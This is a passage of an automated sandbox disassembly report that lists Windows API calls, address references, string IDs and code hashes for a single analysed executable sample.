                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00308F57
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0032184C
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00321872
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003218A2
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 003218E9
                                                                                                                      • Part of subcall function 00322483: GetLastError.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 00322498
                                                                                                                      • Part of subcall function 00322483: SetEvent.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 003224AD
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B1D73
                                                                                                                      • Part of subcall function 002B1D35: GetStockObject.GDI32(00000011), ref: 002B1D87
                                                                                                                      • Part of subcall function 002B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B1D91
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00336461
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00336468
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0033647D
                                                                                                                    • DestroyWindow.USER32(?), ref: 00336485
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00316DBC
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00316DEF
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00316E01
                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00316E3B
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00316E89
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00316EBB
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00316ECC
                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00316F06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: ce66107647ccf9bab99eccfbf4ec9d9f4010f988da1769a687c3b948395942f9
                                                                                                                    • Instruction ID: 848546b9c406dc5e8e6ad53333aad8f0fa29217d7d9bca1ffca2187d1e2237c1
                                                                                                                    • Opcode Fuzzy Hash: ce66107647ccf9bab99eccfbf4ec9d9f4010f988da1769a687c3b948395942f9
                                                                                                                    • Instruction Fuzzy Hash: E421A1795003059FDB269FA9DD46AEA77A8EF49720F200B19FCE0D72D0D770A891CB60
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0031AC54
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0031ACA8
                                                                                                                    • __swprintf.LIBCMT ref: 0031ACC1
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0033F910), ref: 0031ACFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                    • Opcode ID: 9348d8e22d5f35d7aab096865bfe7589de8cb8f8ca24eed291231c0b4725a7a4
                                                                                                                    • Instruction ID: c42587a67d9f884c7c71594f9186aee2018b741a735bef86c70846057e9b0d53
                                                                                                                    • Opcode Fuzzy Hash: 9348d8e22d5f35d7aab096865bfe7589de8cb8f8ca24eed291231c0b4725a7a4
                                                                                                                    • Instruction Fuzzy Hash: 44216D30A00109AFCB11EF65C985EEEBBB8EF49314F004069F909EB252DA31EA51CB61
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 0031115F
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 00311184
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 0031118E
                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0030FCED,?,00310D40,?,00008000), ref: 003111C1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID: @1
                                                                                                                    • API String ID: 2875609808-1806379685
                                                                                                                    • Opcode ID: 74b16dc2aa9f6791c4e439f992785ff6aa6938c40cb1215f68d64792810efd20
                                                                                                                    • Instruction ID: c597d0948eaaef4ed2c7e762146a454555b5e4746ecc7891d168329a287f0da0
                                                                                                                    • Opcode Fuzzy Hash: 74b16dc2aa9f6791c4e439f992785ff6aa6938c40cb1215f68d64792810efd20
                                                                                                                    • Instruction Fuzzy Hash: E2111831D00519EBCF069FA5E889BEEFB78FB09711F414066EB41B2240CB7095A08BA5
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00311B19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    • Opcode ID: 0520056bc8d49dd1144c121032cb94ad2c4e028e9c381ff02f235b452a027a9b
                                                                                                                    • Instruction ID: c6708544545560838e91ba79e7258de4127af3b46a0fd74e4b143589353b5be3
                                                                                                                    • Opcode Fuzzy Hash: 0520056bc8d49dd1144c121032cb94ad2c4e028e9c381ff02f235b452a027a9b
                                                                                                                    • Instruction Fuzzy Hash: E5118E349201088FCF05EF54D8919EEB3B4FF2A304F148465DA55672A1EB325D16CF50
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0032EC07
                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0032EC37
                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0032ED6A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0032EDEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2364364464-0
                                                                                                                    • Opcode ID: 986d7fbace717d0a05bbd8b73ab0b95ff0b7031892430b8b55cf8eae46a6db5b
                                                                                                                    • Instruction ID: 18a7bd0e5dcbf1f404579c1f740916aa660782048dc20927f70f3bddab3d4f4e
                                                                                                                    • Opcode Fuzzy Hash: 986d7fbace717d0a05bbd8b73ab0b95ff0b7031892430b8b55cf8eae46a6db5b
                                                                                                                    • Instruction Fuzzy Hash: 2E819E716043119FD721EF28D886F6AB7E9AF48750F04881DFA999B292DB70AC50CF81
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 00330E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003300FD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0033013C
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00330183
                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 003301AF
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003301BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3440857362-0
                                                                                                                    • Opcode ID: dce4316dfafa6a37634004f86ca8c084dd6b2f11473ced5464fca4606e366ada
                                                                                                                    • Instruction ID: aec43a1cc65d35a7a4c00074340a26bccf075bca658063e299e509d6106b8a98
                                                                                                                    • Opcode Fuzzy Hash: dce4316dfafa6a37634004f86ca8c084dd6b2f11473ced5464fca4606e366ada
                                                                                                                    • Instruction Fuzzy Hash: 74516D31618204AFC719EF58CC91FAAB7E9FF84314F44492DF5968B2A2DB31E914CB52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0032D927
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0032D9AA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0032D9C6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0032DA07
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0032DA21
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00317896,?,?,00000000), ref: 002B5A2C
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00317896,?,?,00000000,?,?), ref: 002B5A50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327935632-0
                                                                                                                    • Opcode ID: 86b8e107355296e4d6dd7a1b81df42f6af5bddd76a988e7668f1c99fa1ad5de5
                                                                                                                    • Instruction ID: 3edb3d5299cdfb1625738ff3122f545b8719379e57fd3ec1a20fda9674c626b5
                                                                                                                    • Opcode Fuzzy Hash: 86b8e107355296e4d6dd7a1b81df42f6af5bddd76a988e7668f1c99fa1ad5de5
• Instruction Fuzzy Hash: CE512635A04619DFCB01EFA8D4849ADB7B8FF09324B05C065E955AB322D730ED95CF90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0031E61F
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0031E648
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0031E687
  • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
  • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0031E6AC
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0031E6B4
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 5a52bba8b016464c048665cc2da639b4588ffcaeffb287999beb0ca7c299f848
• Instruction ID: f653d88d8cf88de61cef11702cc9a2d52528f6cfb8884dbe3a911fde99a9f045
• Opcode Fuzzy Hash: 5a52bba8b016464c048665cc2da639b4588ffcaeffb287999beb0ca7c299f848
• Instruction Fuzzy Hash: 6E511835A10205DFCB05EF64C981AAEBBF5EF09354F1480A9E909AB362CB31ED61DF50
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eab766dfcf347441f3b8a14d2cd4e68b00d867cca44ba0a6be2484615082dc1f
• Instruction ID: 99654222d14ec6436aea23eb57ce1dddef36ce80987a1e4dc578f5aee8e04991
• Opcode Fuzzy Hash: eab766dfcf347441f3b8a14d2cd4e68b00d867cca44ba0a6be2484615082dc1f
• Instruction Fuzzy Hash: E341F635D04904BFD726DF28CCC9FAABBACEB09310F160265F896A72E1C770AD41DA51
APIs
• GetCursorPos.USER32(?), ref: 002B2357
• ScreenToClient.USER32(003757B0,?), ref: 002B2374
• GetAsyncKeyState.USER32(00000001), ref: 002B2399
• GetAsyncKeyState.USER32(00000002), ref: 002B23A7
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 3c2d0bfd65795f2f7fd6699d06d7b4dfd7babbff9ae1db7f671668f320069ff3
• Instruction ID: da1627336276c3330cbfe6e5587987c3a413ad1adbaf1ec756d74faca3763bb8
• Opcode Fuzzy Hash: 3c2d0bfd65795f2f7fd6699d06d7b4dfd7babbff9ae1db7f671668f320069ff3
• Instruction Fuzzy Hash: 9E41A335914206FFCF169F69CC85AE9BBB4FB05360F604355F829962A0C7349DA4DF90
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003063E7
• TranslateAcceleratorW.USER32(?,?,?), ref: 00306433
• TranslateMessage.USER32(?), ref: 0030645C
• DispatchMessageW.USER32(?), ref: 00306466
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00306475
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
• Opcode ID: a4c967bc7504407236bd022b08a9956bcfcc83915accf77fbcaea4c30ec487bc
• Instruction ID: 7f0e754de742553ecda3e8cb8a41599efacc7e5d028aee03b6cc23d7c1104e10
• Opcode Fuzzy Hash: a4c967bc7504407236bd022b08a9956bcfcc83915accf77fbcaea4c30ec487bc
• Instruction Fuzzy Hash: 64310A31A01642AFDB3BCF71CC96BB67BACAB01310F550169E425C30F5E77594A9D7A0
APIs
• GetWindowRect.USER32(?,?), ref: 00308A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00308ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00308AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00308AF0
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00308AF8
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: a53c5673f4d1bd9c40210ecd85f287efd384c25d1a68cdab791a07ddd89a3f8a
• Instruction ID: 9ff2100552f734656a58ffcd97da8af01c3a95be75d6b21fd14b8b2b50d4bbae
• Opcode Fuzzy Hash: a53c5673f4d1bd9c40210ecd85f287efd384c25d1a68cdab791a07ddd89a3f8a
• Instruction Fuzzy Hash: EA310071A00219EFCF00CFA8D98DA9E7BB9EB04315F10822AF865EA1D0C7B09914CB90
APIs
• IsWindowVisible.USER32(?), ref: 0030B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0030B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0030B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0030B27F
• _wcsstr.LIBCMT ref: 0030B289
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: b8738ede55243f5ffd0eca486395ed785ca5cee94a0eaf0382f25398cdef0dae
• Instruction ID: 8faa5625be83c1017df39059c4bbbc3f181ec166b41a14c9d26c5fb78e1ca7ed
• Opcode Fuzzy Hash: b8738ede55243f5ffd0eca486395ed785ca5cee94a0eaf0382f25398cdef0dae
• Instruction Fuzzy Hash: BE212931605200BBEB169B79DC59E7FBBACDF49710F01813AF804DA1E1EF61DC509660
APIs
  • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
• GetWindowLongW.USER32(?,000000F0), ref: 0033B192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0033B1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0033B1CF
• GetSystemMetrics.USER32(00000004), ref: 0033B1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00320E90,00000000), ref: 0033B216
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: fde1915d927970345e349df94a38371140fe153b872df766c3dcf18c489d69df
• Instruction ID: e301e6de250ac920d5bb80360f7163b30aaefe1a89e8dd2031f42a90e3d679df
• Opcode Fuzzy Hash: fde1915d927970345e349df94a38371140fe153b872df766c3dcf18c489d69df
• Instruction Fuzzy Hash: 5F219171E10655EFCB269F389C84A6AB7A8FB05361F124B28FA36D71E0D73098508B90
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00309320
  • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00309352
• __itow.LIBCMT ref: 0030936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00309392
• __itow.LIBCMT ref: 003093A3
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
• Opcode ID: 3054bda6750122cd8814df3a21bec56e39035004611d723fdc75d1f1f375a11c
• Instruction ID: 81d582f3dd84934649199fb155db14eaec9460dbac2de913500746feade4971c
